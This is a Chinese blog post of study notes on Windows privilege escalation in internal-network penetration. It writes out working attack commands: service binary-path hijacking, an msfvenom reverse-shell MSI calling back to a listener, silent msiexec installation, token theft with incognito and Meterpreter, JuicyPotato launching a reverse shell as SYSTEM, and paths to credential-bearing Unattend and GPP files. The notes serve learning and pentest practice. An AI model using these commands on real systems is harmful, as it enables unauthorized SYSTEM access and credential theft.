<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="内网渗透之权限提升"><meta name="keywords" content=""><meta name="author" content="Dar1in9"><meta name="copyright" content="Dar1in9"><title>内网渗透之权限提升 | Dar1in9's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"MY1GAADR9W","apiKey":"5032629da4e94f659d98a4052bc1c5cd","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.0.0'
} </script><meta name="generator" content="Hexo 6.0.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83"><span class="toc-number">1.</span> <span class="toc-text">系统内核漏洞提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%E6%8F%90%E6%9D%83"><span class="toc-number">2.</span> <span class="toc-text">系统服务提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%8D%E5%AE%89%E5%85%A8%E7%9A%84%E6%9C%8D%E5%8A%A1%E6%9D%83%E9%99%90"><span class="toc-number">2.1.</span> <span class="toc-text">不安全的服务权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%8D%E5%8A%A1%E8%B7%AF%E5%BE%84%E5%8F%AF%E6%8E%A7"><span class="toc-number">2.2.</span> <span class="toc-text">服务路径可控</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AA%E5%BC%95%E7%94%A8%E7%9A%84%E6%9C%8D%E5%8A%A1%E8%B7%AF%E5%BE%84"><span class="toc-number">2.3.</span> <span class="toc-text">未引用的服务路径</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MSI%E5%AE%89%E8%A3%85%E7%AD%96%E7%95%A5%E6%8F%90%E6%9D%83"><span class="toc-number">3.</span> <span class="toc-text">MSI安装策略提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%BF%E9%97%AE%E4%BB%A4%E7%89%8C%E6%93%8D%E7%BA%B5"><span class="toc-number">4.</span> <span class="toc-text">访问令牌操纵</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BF%E9%97%AE%E4%BB%A4%E7%89%8C"><span class="toc-number">4.1.</span> <span class="toc-text">访问令牌</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%84%E4%BB%A4%E7%89%8C%E7%AA%83%E5%8F%96%E6%93%8D%E4%BD%9C"><span class="toc-number">4.2.</span> <span class="toc-text">常规令牌窃取操作</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Potato%E5%AE%B6%E6%97%8F%E6%8F%90%E6%9D%83"><span class="toc-number">4.3.</span> <span class="toc-text">Potato家族提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass-UAC"><span class="toc-number">5.</span> <span class="toc-text">Bypass UAC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%94%A8%E6%88%B7%E5%87%AD%E6%8D%AE%E6%93%8D%E4%BD%9C"><span class="toc-number">6.</span> <span class="toc-text">用户凭据操作</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%9A%E4%B8%BEUnattended%E5%87%AD%E6%8D%AE"><span class="toc-number">6.1.</span> <span class="toc-text">枚举Unattended凭据</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%BB%84%E7%AD%96%E7%95%A5%E5%87%AD%E6%8D%AE"><span class="toc-number">6.2.</span> <span class="toc-text">获取组策略凭据</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/kakashi-cat.jpg"></div><div class="author-info__name text-center">Dar1in9</div><div class="author-info__description text-center">人间值得，未来可期</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/Dar1in9s">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">74</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">15</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">14</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://gryffinbit.top">Gryffinbit</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Dar1in9's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">内网渗透之权限提升</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-04-04</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">3.9k</span><span class="post-meta__separator">|</span><span>阅读时长: 13 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>这是《内网渗透体系建设》学习笔记，第四篇：权限提升</p>
<span id="more"></span>


<h2 id="系统内核漏洞提权"><a href="#系统内核漏洞提权" class="headerlink" title="系统内核漏洞提权"></a>系统内核漏洞提权</h2><p><strong>借助WES-NG查找可用的漏洞</strong></p>
<p>WES-NG（Windows Exploit Suggester - Next Generation）根据systeminfo命令执行的结果与操作系统版本进行对比，来搜索系统可利用的漏洞。</p>
<p>地址：<a target="_blank" rel="noopener" href="https://github.com/bitsadmin/wesng">https://github.com/bitsadmin/wesng</a></p>
<p>使用：  </p>
<ol>
<li>更新最新的漏洞数据库 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python wes.py --update</span><br></pre></td></tr></table></figure></li>
<li>在目标机执行systeminfo命令，保存起来</li>
<li>使用wes查找可用的漏洞<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python wes.py systeminfo.txt --impact &quot;Elevation of Privilege&quot; --exploits-only</span><br></pre></td></tr></table></figure></li>
</ol>
<h2 id="系统服务提权"><a href="#系统服务提权" class="headerlink" title="系统服务提权"></a>系统服务提权</h2><p>通常情况下，用户安装的一些应用软件会在本地注册一些服务，并且大多数服务在计算机开机时以系统System权限启动。应用程序在注册服务时，会在一下路径中创建相应的注册表项</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services</span><br></pre></td></tr></table></figure>

<p>Windows系统服务在操作系统启动时运行，并在后台调用其相应的二进制文件。由于大多数系统服务是以系统权限（SYSTEM）启动的，如果让服务启动时执行其他程序，该程序就可以随着服务的启动获得系统权限，这是利用系统服务提权的主要思路。</p>
<h3 id="不安全的服务权限"><a href="#不安全的服务权限" class="headerlink" title="不安全的服务权限"></a>不安全的服务权限</h3><p>ACL定义了安全对象的访问控制策略，用于规定哪些主体用户对其拥有访问权限和拥有什么样的权限。Windows的系统服务正是通过ACL来指定用户对其拥有权限。</p>
<p>假如目标主机的用户在配置服务时存在疏忽，使得低权限用户对高权限用户下运行的系统服务拥有更改服务配置的权限（SERVICE_CHANGE_CONFIG或SERVICE_ALL_ACCESS），就可以通过这个低权限用户直接修改服务启动时的二进制文件路径。</p>
<p>AccessChk工具可以枚举目标主机上存在低权限缺陷的系统服务。</p>
<p>低权限用户可以检查”Authenticated Users”组和”INTERACTIVE”组对系统服务的权限。</p>
<ul>
<li>前者为经过身份验证的用户，包括系统中所有使用用户名、密码登录并通过身份验证的账户（不包括来宾用户）；</li>
<li>后者为交互式用户组，包含系统中所有直接登录到计算机进行验证的用户。</li>
<li>默认情况下，这两个组为计算机本地“Users”组的成员。</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">枚举目标主机<span class="string">&quot;Authenticated Users&quot;</span>组是否具有更改服务配置的权限</span></span><br><span class="line">accesschk.exe /accepteula -uwcqv &quot;Authenticated Users&quot; *</span><br></pre></td></tr></table></figure>
<p>如果”Authenticated Users”组对某服务具有SERVICE_CHANGE_CONFIG权限，即可执行如下命令，将服务启动时执行的二进制文件替换为恶意文件。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc config XXXX binpath= &quot;cmd.exe /k C:\Users\Public\hack.exe&quot;</span><br></pre></td></tr></table></figure>

<p>如果当前用户对服务拥有SERVICE_STOP和SERVICR_START权限，意味着用户对服务具有重启权限</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">sc stop XXX</span><br><span class="line">sc start xxx</span><br><span class="line">```  </span><br><span class="line">如果没有重启权限，对于启动类型为&quot;自动&quot;的服务，可以尝试通过重启计算机的方法来重启服务。</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="language-bash"><span class="comment">## 服务注册表权限脆弱</span></span></span><br><span class="line"></span><br><span class="line">执行以下命令，通过AccessChk枚举&quot;Authenticated Users&quot;用户组具有写入权限的服务注册表</span><br><span class="line">```shell</span><br><span class="line">accesschk.exe /accepteula -uvwqk &quot;Authenticated Users&quot; HKLM\SYSTEM\CurrentControlSet\Services</span><br></pre></td></tr></table></figure>

<p>执行以下命令，对服务注册表中的ImagePath进行修改，指向恶意文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XXXX /v ImagePath /t REG_EXPAND_SZ /d &quot;cmd.exe /k C:\Users\public\xxxx.exe&quot;</span><br></pre></td></tr></table></figure>

<p>检查当前用户对服务是否有重启权限</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">accesschk.exe /accepteula -ucqv &quot;Authenticated Users&quot; RegSvc</span><br></pre></td></tr></table></figure>

<h3 id="服务路径可控"><a href="#服务路径可控" class="headerlink" title="服务路径可控"></a>服务路径可控</h3><p>如果目标主机上用户存在错误配置或操作，使得一个低权限用户对此服务调用的二进制文件或在其目录拥有写权限，那么可以直接替换该文件。</p>
<p>查看指定服务的二进制文件所在目录是否具有写入权限</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">accesschk.exe /accepteula -quv &quot;Authenticated Users&quot; &quot;C:\Program Files\XXXX&quot;</span><br></pre></td></tr></table></figure>

<h3 id="未引用的服务路径"><a href="#未引用的服务路径" class="headerlink" title="未引用的服务路径"></a>未引用的服务路径</h3><p>未引用的服务路径（Unquoted Service Path)漏洞曾被称为可信任的服务路径（Trusted Service Path），利用了Windows文件路径解析的特性。当服务启动所执行的二进制文件的路径中包含空格且未有效包含在引号中时，就会导致该漏洞。</p>
<p>当服务的二进制文件完整路径中包含空格，且为有效的包含在引号中，那么对于该路径的每个空格，Windows会按照从左到右的顺序依次尝试并执行与空格前的名字相匹配的程序。例如，对于路径C:\Program Files\Sub Dir\Program Name.exe，系统依次寻找并执行以下程序：C:\Program.exe、C:\Program Files\Sub.exe、C:\Program Files\Sub Dir\Program.exe、C:\Program Files\Sub Dir\Program Name.exe</p>
<p>执行如下命令，枚举目标主机上所有漏洞系统服务：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic service get DisplayName, PathName, StartMode |findstr /i /v &quot;C:Windows\\&quot; |findstr /i /v &quot;&quot;&quot;</span><br></pre></td></tr></table></figure>

<h2 id="MSI安装策略提权"><a href="#MSI安装策略提权" class="headerlink" title="MSI安装策略提权"></a>MSI安装策略提权</h2><p>MSI安装策略提权是由于用户在配置MSI安装策略时，启用了“永远以高特权进行安装”（AlwaysInstallElevated，默认禁用），使得任何权限的用户都可以通过SYSTEM权限安装MSI程序。此时，可以在目标主机上安装一个预先制作的恶意MSI文件，以获得SYSTEM权限。  </p>
<p><strong>确认系统是否存在漏洞</strong><br>在启用<code>AlwaysInstallElevated</code>后，系统会自动在注册表的一下两处创建键值1</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HKEY_CURRENTUSER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated</span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated</span><br></pre></td></tr></table></figure>

<p>执行以下命令查看是否开启<code>AlwaysInstallElevated</code>：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</span><br><span class="line">reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</span><br></pre></td></tr></table></figure>

<p><strong>创建恶意MSI并安装</strong></p>
<p>使用msf生成msi</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.100.10 lport=4444 -f msi -o eval.msi</span><br></pre></td></tr></table></figure>

<p>上传msi，执行</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msiexec /quiet /qu /i eval.msi</span><br><span class="line"><span class="meta"># </span><span class="language-bash">/quiet    在安装期间禁止向用户发送任何消息</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">/qu     无GUi</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">/i     常规安装</span></span><br></pre></td></tr></table></figure>

<h2 id="访问令牌操纵"><a href="#访问令牌操纵" class="headerlink" title="访问令牌操纵"></a>访问令牌操纵</h2><p>Windows的访问控制模型（Access Control Model）是Windows系统安全性的基础构件，由访问令牌（Access Token）和安全描述符（Secruity Description）两部分组成，二者分别由访问者和被访问者持有。通过比较访问令牌和安全描述符的内容，Windows可以对访问者是否拥有访问资源对象的能力进行判定。</p>
<h3 id="访问令牌"><a href="#访问令牌" class="headerlink" title="访问令牌"></a>访问令牌</h3><p>访问令牌是描述进程或线程安全上下文的对象，包含与进程相关联的用户账户的标识和特权信息。系统使用访问访问令牌来控制用户可以访问的安全对象，并限制用户执行相关系统操作的能力。</p>
<p>当用户登录时，系统将对用户进行身份认证，如果认证成功，就会为用户创建一个访问令牌，包括登录过程中返回的SID以及由本地安全策略分配给用户和用户所属安全组的特权列表。此后，代表该用户执行的每个进程都有此访问令牌的副本，每当线程或进程与安全对象交互或尝试执行需要特权的系统任务，系统都会使用此访问令牌标识并确定关联的用户。</p>
<p>Windows的令牌可以分为主令牌（Primary Token）和模拟令牌（Impersonation Token）。主令牌与进程相关联，是由Windows内核创建并分配给进程的默认访问令牌，每个进程都有一个主令牌，描述了与当前进程相关联的用户账户的安全上下文。默认情况下，当进程的线程与安全对象交互时，系统将使用主令牌。此外，线程可以模拟客户端账户。模拟是指线程在安全上下文中执行的能力，并且该上下文不同于拥有该线程的进程的上下文。当线程模拟客户端时，模拟线程将同时具有主访问令牌和模拟令牌。</p>
<p>通常，通过操纵访问令牌，使正在运行的进程看起来是其他进程的子进程或属于其他用户所启动的进程。<strong>这常常使用内置的Windows API从指定的进程中复制访问令牌，并将得到的访问令牌用于现有进程或生成新进程，以达到权限提升并绕过访问控制的目的，这个过程被称为令牌窃取。</strong></p>
<p>注意，令牌窃取只能在特权用户上下文中才能完成，因为通过令牌创建进程使用的<code>CreateProcessWithTokenW</code>和<code>CreateProcessAsUserA</code>两个Windows API分别要求用户必须拥有<code>SeImpersonatePrivilege</code>和<code>SeAssignPrimaryTokenPrivilege/SeIncreaseQuotaPrivilege</code>特权，而拥有这两个特权的用户一般为系统管理员、网络服务账户和系统服务账户。</p>
<h3 id="常规令牌窃取操作"><a href="#常规令牌窃取操作" class="headerlink" title="常规令牌窃取操作"></a>常规令牌窃取操作</h3><p><strong>利用incognito.exe窃取令牌</strong></p>
<p>列举当前主机上的所有访问令牌：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">incognito.exe list_tokens -u</span><br></pre></td></tr></table></figure>

<p>窃取<code>NT AUTHORITY\SYSTEM</code>账户的访问令牌并创建进程</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">incognito.exe execute -c &quot;NT AUTHORITY\SYSTEM&quot; whoami</span><br><span class="line"><span class="meta"># </span><span class="language-bash">-c 要窃取的令牌</span></span><br></pre></td></tr></table></figure>

<p><strong>利用msf窃取令牌</strong></p>
<p>msf框架内置了一个incognito模块</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">load incognito                            # 加载模块</span><br><span class="line">list_token -u                             # 列出主机上所有的访问令牌</span><br><span class="line">impersonate_token &quot;NT AUTHORITY\SYSTEM&quot;   # 窃取NT AUTHORITY\SYSTEM账户的令牌</span><br><span class="line">steal_token &lt;PID&gt;                         # 从指定的进程中窃取令牌</span><br></pre></td></tr></table></figure>


<p><strong>通过令牌获取TrustedInstaller权限</strong><br>SYSTEM权限为系统最高权限，但是SYSTEM权限不能修改Windows系统文件，例如C:\Windows\servicing目录</p>
<p>从Windows Vista开始，系统内置了一个TrustedInstaller安全主体，拥有修改系统文件的权限，专门用于对系统进行维护、更新等操作。TrustedInstaller以一个账户组的形式出现，及<code>NT SERVICE\TrustedInstaller</code></p>
<p>通常情况下，可以通过令牌窃取的方式获取系统TrustedInstaller权限。由于TrustedInstaller本身也是一个服务，当启动服务时，会运行TrustedInstaller.exe，该程序路径为<code>C:\Windows\Servicing\TrustedInstaller.exe</code>，其拥有者为<code>NT SERVICE\TrustedInstaller</code>。因此我们可以通过窃取TrustedInstaller.exe进程的令牌，以提升至TrustedInstaller权限。</p>
<p>先启动TrustedInstaller服务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc start TrustedInstaller</span><br></pre></td></tr></table></figure>
<p>记录服务的Pid，并执行<code>steal_token &lt;PID&gt;</code>，窃取令牌</p>
<h3 id="Potato家族提权"><a href="#Potato家族提权" class="headerlink" title="Potato家族提权"></a>Potato家族提权</h3><p>Potato家族提权，通过操纵访问令牌，可以将以获取的Windows服务账户提权至系统SYSTEM权限。</p>
<p>在实战场景中，若成功拿到了IIS等服务的Webshell，或者通过MSSQL的xp_cmdshell成功执行了系统命令，此时获取的服务账户拥有<code>SeImpersonatePrivilege</code>和<code>SeAssingPrimaryTokenPrivilege</code>特权，就可以通过Potato家族提权至SYSTEM权限。</p>
<p><strong>Rotten Potato（烂土豆）</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/breenmachine/RottenPotatoNG">https://github.com/breenmachine/RottenPotatoNG</a></p>
<p>Rotten Potato提权大致可分为三步：<br>1、通过CoGetInstanceFromStorage API，将一个COM对象（BITS）加载到本地可控的端口（TCP6666），并诱骗BITS对象以<code>NT AUTHORITY\SYSTEM</code>账户的身份向该账户发起NTLM认证<br>2、借助本地RPC135端口，对BITS对象的认证过程执行中间人攻击，同时调用相关API为<code>NT AUTHORITY\SYSTEM</code>账户在本地生成一个访问令牌<br>3、通过<code>NT AUTHORITY\SYSTEM</code>账户的令牌创建新进程，以获取SYSTEM权限。</p>
<p>利用步骤：</p>
<ol>
<li>执行<code>whoami /priv</code>命令，查看当前账户的特权列表</li>
<li>加载incognito模块   <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">load incognito</span><br></pre></td></tr></table></figure></li>
<li>上线msf，向目标主机上传Rotten Potato，通过以下命令在meterpreter中运行 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">execute -Hc -f rottenpotato.exe</span><br><span class="line"><span class="meta"># </span><span class="language-bash">-H 不可见、-c 通道化IO、-f 要执行的程序</span></span><br></pre></td></tr></table></figure></li>
<li>查看可用的访问令牌、窃取<code>NT AUTHORITY\SYSTEM</code>账户的令牌 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impersonate_token &quot;NT AUTHORITY\SYSTEM&quot;</span><br></pre></td></tr></table></figure></li>
</ol>
<p><strong>Juicy Potato</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/ohpe/juicy-potato">https://github.com/ohpe/juicy-potato</a></p>
<blockquote>
<p>仅适用于Windows 10 version 1809 和Windows Server 2019之前版本的系统</p>
</blockquote>
<p>Juicy Potato与Rotten Potato原理相同，在Rotten Potato的基础上进行了扩展，不再像Rotten Potato那样依赖一个meterpreter，并且可以自定义COM对象加载的端口，以及根据不同的系统版本更换可用的COM对象。</p>
<p>利用步骤：</p>
<ol>
<li><p>上传juicyPotato程序，并根据操作系统版本选择一个可用的COM对象，记录其CLSID<br> <a target="_blank" rel="noopener" href="https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md">https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md</a></p>
</li>
<li><p>执行以下命令，运行JuicyPotato，将获取SYSTEM权限并运行指定的程序，这里执行的是msf的木马程序</p>
 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">juicyPotato.exe -t * -p C:\Users\Public\reverse_tcp.exe -l 9889 -n 135 -c &#123;F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4&#125; 9889 </span><br><span class="line"><span class="meta"># </span><span class="language-bash">-t createprocess call: &lt;t&gt; CreateProcessWithTokenW, &lt;u&gt; CreateProcessAsUser, &lt;*&gt; try both</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">-n &lt;port&gt;: RPC server listen port (default 135)</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">-p &lt;program&gt;: program to launch</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">-l &lt;port&gt;: COM server listen port</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">-c &lt;&#123;clsid&#125;&gt;: CLSID (default BITS:&#123;4991d34b-80a1-4291-83b6-3328366b9097&#125;)</span></span><br></pre></td></tr></table></figure></li>
</ol>
<p>除了这种方式，还可以直接在webshell环境中利用</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">juicyPotato.exe -a whoami</span><br></pre></td></tr></table></figure>


<p><strong>PrintSpoofer（Pipe Potato）</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/itm4n/PrintSpoofer">https://github.com/itm4n/PrintSpoofer</a></p>
<p>PrintSpoofer主要利用了打印机组件路径检查中存在的一个Bug，使高权限的服务能连接到测试人员创建的命名管道，以获取高权限账户的令牌来创建新进程。</p>
<p>执行方法：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PrintSpoofer.exe -i -c whoami</span><br></pre></td></tr></table></figure>


<p><strong>Sweet potato</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/uknowsec/SweetPotato">https://github.com/uknowsec/SweetPotato</a></p>
<p>sweet potato集成了RottenPotato、JulyPotato、RoguWinRm和PrintSpoofer的功能。</p>
<h2 id="Bypass-UAC"><a href="#Bypass-UAC" class="headerlink" title="Bypass UAC"></a>Bypass UAC</h2><p>用户账户控制（User Account Control，UAC）是Windows采用的一种控制机制，可以阻止自动安装未经授权的应用并防止意外更改系统设置，有助于防止恶意软件损坏计算机。UAC使应用程序和任务始终在非管理员账户的安全上下文中运行，除非管理员专门授予管理员级别的权限。开启UAC后，每个需要使用管理员访问令牌的应用都必须征得用户同意。</p>
<p>UAC限制所有用户包括非RID 500的管理员用户</p>
<p><a target="_blank" rel="noopener" href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a></p>
<h2 id="用户凭据操作"><a href="#用户凭据操作" class="headerlink" title="用户凭据操作"></a>用户凭据操作</h2><h3 id="枚举Unattended凭据"><a href="#枚举Unattended凭据" class="headerlink" title="枚举Unattended凭据"></a>枚举Unattended凭据</h3><p>无人值守（Unattended）安装允许应用程序在不需要管理员关注下自动安装。无人值守安装的问题是会在系统中残留一些配置文件，其中可能包含本地管理员的用户名和密码。</p>
<p>常见的路径如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">c:\sysprep.inf</span><br><span class="line">c:\sysprep\sysprep.xml</span><br><span class="line">c:\Windows\system32\sysprep.inf</span><br><span class="line">c:\windows\system32\sysprep\sysprep.xml</span><br><span class="line">c:\unattend.xml</span><br><span class="line">c:\windows\Panther\Unattend.xml</span><br><span class="line">c:\Windows\Panther\Unattended.xml</span><br><span class="line">c:\windows\Panther\Unattend\unattended.xml</span><br><span class="line">c:\windows\Panther\Unattend\Unattend.xml</span><br><span class="line">c:\windows\System32\Sysprep\Unattend.xml</span><br><span class="line">c:\windows\System32\Sysprep\Panther\Unattend.xml</span><br></pre></td></tr></table></figure>

<p>msf中提供了<code>post/windows/ghther/enum_unattend</code>模块，可以从Unattend配置文件中自动化检出密码。</p>
<h3 id="获取组策略凭据"><a href="#获取组策略凭据" class="headerlink" title="获取组策略凭据"></a>获取组策略凭据</h3><p>在Windows server 2008中引入了组策略首选行，允许网络管理员对指定计算机和用户配置特定的设置。</p>
<p>在大型的企业或组织的域环境中，网络管理员往往会通过下方组策略的方式对所有加入域的计算机的本地管理员进行批量修改。在新建一个组策略后，域控制器会自动在SYSVOL共享目录中生成一个XML文件，该文件保存了组策略更新后的密码。SYSVOl是安装活动目录时创建的一个用于存储公共文件服务器副本的共享文件夹，主要存放登录脚本、组策略数据以及其他域控制器需要的域信息等，并在所有经过身份认证的域用户或者域信任用户范围内共享。<br>通过<code>net share</code>可以看到这个SYSVOl目录。</p>
<p>在SYSVOL目录中，有一个Groups.xml文件，其中的cpassword字段保存了经过AES256算法加密后的密码，但是这个加密私钥在2012年被微软公开了。因此任意经过认证的用户都可以读取保存在xml文件的密码。</p>
